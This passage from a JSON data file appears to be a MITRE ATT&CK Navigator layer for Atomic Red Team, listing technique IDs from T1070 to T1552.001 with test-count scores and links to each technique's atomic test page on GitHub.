Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":31,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":59,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":76,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View 